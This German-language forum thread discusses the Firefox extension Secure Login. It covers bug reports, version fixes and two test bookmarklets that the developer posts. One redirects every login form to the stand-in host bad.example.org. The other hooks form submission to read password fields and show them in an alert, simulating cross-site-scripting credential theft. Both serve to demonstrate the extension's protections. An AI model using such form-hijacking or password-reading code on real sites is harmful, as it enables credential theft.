[Erw] Opera Wand (Zauberstab) für Firefox - Secure Login

    madblueimp,

    Zitat von Gen. Bully

    Hm, also irgendwie funktioniert ConQuery seit dem Update auf 0.5 nicht mehr. Steht zwar noch im Kontextmenü drin. Aber in der Auswahlliste erscheint keine Suchmaschine mehr.


    Hatte hier das selbe Problem, :?:
    teilweise auch in der Toolbarsuchleiste ohne Suchmaschineneinträge wenn ich dann auf Suchmaschinen verwalten klicke wurden sie angezeigt aber beim schließen des Kontextfensters stürzte der FF ins nirwana :cry:

    Also wieder Downdate auf 0.4.2 die läuft und läuft und läuft .............................................................................. hier ohne Probleme :D

    Gruß ReVox
    "Theorie ist, wenn man alles weiß und nichts geht. Praxis ist, wenn alles funktioniert und nicht weiß warum.
    Bei Windows sind Theorie und Praxis vereint, nichts funktioniert und keiner weiß warum!"
    Meine gegebenen Tips & Antworten sind wie die Lottozahlen - immer ohne Gewähr ;)

    Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.5.1-ESR

    Konnte die Kompatibilitäts-Probleme mit der Erweiterung ConQuery bestätigen.
    Sie sind in der neuen Version 0.5.1 behoben.

    Es lag daran, das ich das JavaScript Prototype "Array" mit der (fehlenden, aber oftmals gebrauchten) Methode "inArray" erweitert hatte und ConQuery damit nicht klar kam.

    Mir war nicht bewusst, das die Prototype-Erweiterung auch außerhalb meiner Extension Einfluss nehmen würde - in Zukunft werde ich das berücksichtigen und nur meinen eigenen Objekten und Prototypen Methoden hinzufügen.

    Seit Version 0.5 gibt es auch ein erweitertes Kontext-Menü (Rechtsklick auf das Secure Login Icon), das neben dem Zugriff auf verschiedene SecureLogin-Einstellungen auch einen schnellen Zugriff auf die gespeicherten Passwörter und die Ausnahmen-Liste des Firefox Passwort-Manager bietet.

    madblueimp

    Zitat von madblueimp

    Konnte die Kompatibilitäts-Probleme mit der Erweiterung ConQuery bestätigen.
    Sie sind in der neuen Version 0.5.1 behoben.

    Es lag daran, das ich das JavaScript Prototype "Array" mit der (fehlenden, aber oftmals gebrauchten) Methode "inArray" erweitert hatte und ConQuery damit nicht klar kam.

    Mir war nicht bewusst, das die Prototype-Erweiterung auch außerhalb meiner Extension Einfluss nehmen würde - in Zukunft werde ich das berücksichtigen und nur meinen eigenen Objekten und Prototypen Methoden hinzufügen.

    Seit Version 0.5 gibt es auch ein erweitertes Kontext-Menü (Rechtsklick auf das Secure Login Icon), das neben dem Zugriff auf verschiedene SecureLogin-Einstellungen auch einen schnellen Zugriff auf die gespeicherten Passwörter und die Ausnahmen-Liste des Firefox Passwort-Manager bietet.

    Also die vorherigen Fehler sind durch die Änderungen in der Vers.0.5.1 bisher noch nicht wieder vorgekommen! :D

    Nur was mir überhaupt nicht gefällt, ist nachdem ich das Secure Icon (Schlüssel) in der Statusleiste aktiviert habe,
    wird der Loginvorgang schon beim Rechtsklick auf das Symbol ausgelöst. :?
    Das sollte meiner Meinung nach nicht sein, sondern es dürfte sich nur das Kontext-Menü (Rechtsklick auf das Secure Login Icon), das neben dem Zugriff auf verschiedene SecureLogin-Einstellungen auch einen schnellen Zugriff auf die gespeicherten Passwörter und die Ausnahmen-Liste des Firefox Passwort-Manager bietet dazu öffnen,
    aber nicht das Login selbst auslösen :!: :!::!:

    Gruß ReVox
    "Theorie ist, wenn man alles weiß und nichts geht. Praxis ist, wenn alles funktioniert und nicht weiß warum.
    Bei Windows sind Theorie und Praxis vereint, nichts funktioniert und keiner weiß warum!"
    Meine gegebenen Tips & Antworten sind wie die Lottozahlen - immer ohne Gewähr ;)

    Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.5.1-ESR

    ReVox: Bug bestätigt und in der Version 0.5.2 beseitigt.

    Ich hatte diesen Fehler nicht bemerkt, da ich unter Xubuntu (Linux) entwickle und der Fehler dort nicht auftrat.
    Ganz so plattformunabhängig ist das Extension Development wohl doch nicht. :|


    Ich würde euch übrigens raten, als Student nicht in der Prüfungszeit mit dem Extension Development anzufangen, das drückt den Notenschnitt. ;)


    @all: Dankeschön. Lob und Verbesserungsvorschläge höre ich immer gerne. :)

    :klasse: Genau so sollte es sein, jetzt läufts wieder wunnebar. :klasse:

    Gruß ReVox
    "Theorie ist, wenn man alles weiß und nichts geht. Praxis ist, wenn alles funktioniert und nicht weiß warum.
    Bei Windows sind Theorie und Praxis vereint, nichts funktioniert und keiner weiß warum!"
    Meine gegebenen Tips & Antworten sind wie die Lottozahlen - immer ohne Gewähr ;)

    Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.5.1-ESR

    Wenn ihr folgenden JavaScript-Code in die Adresszeile eingebt, nachdem ihr eine beliebige Login-Seite geladen habt, für die ihr Login-Daten hinterlegt habt, könnt ihr eine der Schutzmechanismen der SecureLogin-Erweiterung testen:

    Code
    javascript:(function(){for(var i=0;i<document.forms.length;i++){document.forms[i].action='http://bad.example.org';}})();


    Secure Login wird euch beim Login nachfragen, ob ihr euch wirklich auf bad.example.org einloggen wollt und ihr könnt den Login-Vorgang abbrechen, ohne das eure Anmeldedaten an bad.example.org übertragen werden.

    Die geänderte Login-URL zeigt euch im übrigen auch der Tooltip der Icons an.

    Funktionieren alle beide :wink:

    Die Erweiterung selbst :klasse:
    Und der JavaScript-Code. 8)

    Gruß ReVox
    "Theorie ist, wenn man alles weiß und nichts geht. Praxis ist, wenn alles funktioniert und nicht weiß warum.
    Bei Windows sind Theorie und Praxis vereint, nichts funktioniert und keiner weiß warum!"
    Meine gegebenen Tips & Antworten sind wie die Lottozahlen - immer ohne Gewähr ;)

    Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.5.1-ESR

    Und gleich noch ein Test:
    Diesmal zur Demonstration des "JavaScript-Schutz beim Einloggen".

    Dazu könnt ihr wiederum den folgenden JavaScript-Code in die Adresszeile eingeben und ausführen, nachdem ihr eine beliebige Login-Seite geladen habt, für die ihr im Passwort-Manager Login-Daten hinterlegt habt:

    Code
    javascript:(function(){for(var i=0;i<document.forms.length;i++){document.forms[i].addEventListener('submit',function(event){for(var j=0;j<event.currentTarget.elements.length;j++){if(event.currentTarget.elements[j].type=='password')alert('Password: '+event.currentTarget.elements[j].value);}},false);}})();


    Ohne aktivierten Schutz wird euer Passwort beim Einloggen in einer Warnmeldung präsentiert.
    Mit aktiviertem Schutz passiert das nicht.

    Daher empfiehlt es sich, den Schutz zu aktivieren und Seiten, die damit nicht funktionieren in die Liste der Ausnahmen aufzunehmen.

    Hi mad.

    Zitat von madblueimp

    Wenn ihr folgenden JavaScript-Code in die Adresszeile eingebt, nachdem ihr eine beliebige Login-Seite geladen habt, für die ihr Login-Daten hinterlegt habt, könnt ihr eine der Schutzmechanismen der SecureLogin-Erweiterung testen:

    Code
    javascript:(function(){for(var i=0;i<document.forms.length;i++){document.forms[i].action='http://bad.example.org';}})();


    Secure Login wird euch beim Login nachfragen, ob ihr euch wirklich auf bad.example.org einloggen wollt und ihr könnt den Login-Vorgang abbrechen, ohne das eure Anmeldedaten an bad.example.org übertragen werden.

    Die geänderte Login-URL zeigt euch im übrigen auch der Tooltip der Icons an.

    Bei Eingabe des Codes zuckt der Firefox nicht mal mit der Wimper. Warum auch immer.... jedenfalls gut so. ;)

    Danke für die zusätzlichen Features in der neuen Version.

    Schöne Jecken-Tage noch.....Mein Karneval ist eh vorbei.Grmpf, immer diese Pauken. :roll:

    Greetz
    Cheffi

    ich@last.fm

    MacBook Pro//Mac OS X//FF 3.0//TB 2.0.0.14

    Zitat von Cheffi

    Hi mad.

    Bei Eingabe des Codes zuckt der Firefox nicht mal mit der Wimper. Warum auch immer.... jedenfalls gut so. ;)

    Danke für die zusätzlichen Features in der neuen Version.

    Schöne Jecken-Tage noch.....Mein Karneval ist eh vorbei.Grmpf, immer diese Pauken. :roll:

    Greetz
    Cheffi

    Hi Cheffi,
    damit SecureLogin überhaupt richtig funktioniert mußt Du Javascript aktiviert haben und den oben aufgeführten Script wie beschrieben eintragen und auch durch die Return/Enter Taste aufrufen. :-??
    Sonst passiert da auch nichts. :wink:
    HELAU :D

    Gruß ReVox
    "Theorie ist, wenn man alles weiß und nichts geht. Praxis ist, wenn alles funktioniert und nicht weiß warum.
    Bei Windows sind Theorie und Praxis vereint, nichts funktioniert und keiner weiß warum!"
    Meine gegebenen Tips & Antworten sind wie die Lottozahlen - immer ohne Gewähr ;)

    Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.5.1-ESR

    Also bei mir passiert bei den jeweiligen Scripten auch nix.
    JS ist jedenfalls aktiviert und je nach Scriptversuch die
    entsprechende SecureLogin Einstellung.

    Aber beim bzw. nach dem einloggen passiert nix.
    Es geht nur ein Tab auf, wenn ich das Script abschicke.

    Sind TMP oder auch ABP im Weg ?

    ...:AOD:...

    HP Chromebook 15a-nb0225ng, i3N-305, 8 GB LPDDR5-4800 MHz RAM (integriert), 256GB UFS, - chromeOS 126 (Stable Channel) - Linux Debian Bookworm: Firefox Nightly, Beta und Main Release (Mozilla PPA), Android 13: Firefox Nightly und Firefox (Main Release)

    Smartphone - Firefox Main Release, Firefox Nightly, Firefox Klar (Main Release)

    Zitat von ReVox

    damit SecureLogin überhaupt richtig funktioniert mußt Du Javascript aktiviert haben und den oben aufgeführten Script wie beschrieben eintragen und auch durch die Return/Enter Taste aufrufen

    Du meinst wahrscheinlich, das für den Test JavaScript aktiviert sein muss.
    Aber damit keine Missverständnisse aufkommen:
    Damit die Erweiterung SecureLogin funktioniert, muss JavaScript nicht aktiviert sein!
    (Mal abgesehen davon, das Firefox intern und für die Erweiterungen JavaScript genutzt wird, das hat aber mit der Option, für Webseiten JS zu deaktivieren nichts zu tun).


    Ich glaube nicht, das TabMixPlus die Tests unterbindet. AdBlockPlus tut es jedenfalls nicht, das ist auch in der Liste meiner genutzten Erweiterungen.
    Falls NoScript JavaScript für die Login-Seite deaktiviert, funktionieren die Tests natürlich nicht.


    Der erste Test ändert den Wert des "action"-Attributs aller Formulare auf der geladenen Seite auf "http://bad.example.org" (eine Nicht-existierende Beispiel-Website).
    Der zweite Test fügt allen Formularen der geladenen Seite einen EventHandler für das "submit"-Event hinzu und zeigt beim Abschicken des Formulars die Inhalte vorhandener Passwort-Felder in einem Warnungs-Fenster (alert).


    Hier nochmal eine genauere Beschreibung zur Ausführung der Tests, speziell für dieses Forum:

    - JavaScript für dieses Forum aktivieren
    - Aus diesem Forum ausloggen
    - http://www.firefox-browser.de/forum/ aufrufen
    - In die Adresszeile einen der Test-JavaScript-Codes eingeben und die "Enter/Return"-Taste drücken, noch während der Fokus in der Adresszeile liegt, oder alternativ auf das grüne Dreieck klicken (im Falle des Standard-Themes von Firefox 2)
    - Im Falle des ersten Tests, einfach per SecureLogin einloggen (Klick auf Toolbar oder Statusbar Icon oder ALT+N)
    - Im Falle des zweiten Tests, einmal ohne und einmal mit aktivierter Option "JavaScript-Schutz beim einloggen aktivieren" per SecureLogin einloggen


    Falls ihr jemanden vom Firefox Passwort-Manager + SecureLogin überzeugen wollt, die Tests funktionieren natürlich auch, falls man die Login-Daten manuell eingibt.


    SecureLogin kann also als zusätzlicher Phishing-Schutz angesehen werden.
    Denn sogar falls man auf einer böswilligen Website landet, die wie die Original-Seite aussieht, kann man sich dort nicht versehentlich einloggen, da ja für diese Seite keine Passwörter hinterlegt sind.

    Nicht schützen kann SecureLogin allerdings davor, wenn es ein Angreifer schaffen sollte, die DNS-Namensauflösung auf sich umzubiegen. Das geht allerdings schon weit über Cross-site scripting hinaus und dafür müsste ein Angreifer schon gezielter vorgehen, z.B. in dem er euren Router übernimmt oder euren DNS-Server oder euren Rechner. Dann habt ihr allerdings sowieso ein Problem. ;)

    Als Phishing-Schutz empfehle ich euch ansonsten OpenDNS, das auch als DNS-Server oft eine bessere Figur macht als die DNS-Server der DSL-Provider.


    Und falls sich jetzt noch jemand fragt, wie überhaupt fremder JavaScript-Code auf eine vertrauenswürdige Seite gelangen kann, dem empfehle ich folgende Links:
    http://www.google.de/search?q=site%…-site+scripting
    Cross-site scripting

    Also ich habe es so gemacht wie du geschrieben hast.
    Jeweils mit 1.5.0.10 sowie 2.0.0.2 als auch mit 1.5.0.9
    und 2.0.0.1. Aber jeweils passiert nix, ausser das sich ein
    neues leeres Tab öffnet, wenn ich den Code in der URLbar abschicke.

    Wenn ich mich nun hier im Forum einlogge passiert nix, ausser
    das ich eingeloggt bin ... Es kommt kein Hinweis oder auch nur
    irgendetwas anderes.

    PS: NoScript verwende ich nicht

    ...:AOD:...

    HP Chromebook 15a-nb0225ng, i3N-305, 8 GB LPDDR5-4800 MHz RAM (integriert), 256GB UFS, - chromeOS 126 (Stable Channel) - Linux Debian Bookworm: Firefox Nightly, Beta und Main Release (Mozilla PPA), Android 13: Firefox Nightly und Firefox (Main Release)

    Smartphone - Firefox Main Release, Firefox Nightly, Firefox Klar (Main Release)

    OK, habe es eben getestet:
    Anscheinend kann man kein JavaScript-Code mehr in der Addressleiste ausführen, wenn die Erweiterung TabMixPlus installiert ist.

    Du kannst die Tests aber auch mit aktiviertem TabMixPlus durchführen, in dem du den JavaScript-Test-Code als Bookmarklet abspeicherst.
    Dazu einfach ein neues Lesezeichen erstellen und als Ort den JavaScript-Code eingeben.

    Nach dem Laden der Login-Seite dann einfach das Bookmarklet aufrufen.


    madblueimp,
    ja ich meinte natürlich nur für den Script-Test.

    Zitat von madblueimp

    OK, habe es eben getestet:
    Anscheinend kann man kein JavaScript-Code mehr in der Addressleiste ausführen, wenn die Erweiterung TabMixPlus installiert ist.

    habe es vorher genau so immer getestet wie Du es vorher oben beschrieben hast, auch mit installierten und aktiven TabMixPlus bei mir erscheint dann das Fenster mit der Frage ob ich mich wirklich einloggen will.
    Wie gesagt bei mir funktioniert das bisher ohne Probleme. :klasse:

    Gruß ReVox
    "Theorie ist, wenn man alles weiß und nichts geht. Praxis ist, wenn alles funktioniert und nicht weiß warum.
    Bei Windows sind Theorie und Praxis vereint, nichts funktioniert und keiner weiß warum!"
    Meine gegebenen Tips & Antworten sind wie die Lottozahlen - immer ohne Gewähr ;)

    Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.5.1-ESR

    Zitat von ReVox

    habe es vorher genau so immer getestet wie Du es vorher oben beschrieben hast, auch mit installierten und aktiven TabMixPlus bei mir erscheint dann das Fenster mit der Frage ob ich mich wirklich einloggen will.
    Wie gesagt bei mir funktioniert das bisher ohne Probleme. :klasse:

    Dann hast du bei TMP wohl eingestellt, dass du Fenster zulässt.
    Ich habe es eingestellt, dass alles in Tabs landet.
    Hätte ich auch vorher drauf kommen können. Aber manchmal sieht
    man den Wald vor lauter Bäumen nicht mehr. Vor allem
    bei dem Testing-Stress zur Zeit :)

    ...:AOD:...

    HP Chromebook 15a-nb0225ng, i3N-305, 8 GB LPDDR5-4800 MHz RAM (integriert), 256GB UFS, - chromeOS 126 (Stable Channel) - Linux Debian Bookworm: Firefox Nightly, Beta und Main Release (Mozilla PPA), Android 13: Firefox Nightly und Firefox (Main Release)

    Smartphone - Firefox Main Release, Firefox Nightly, Firefox Klar (Main Release)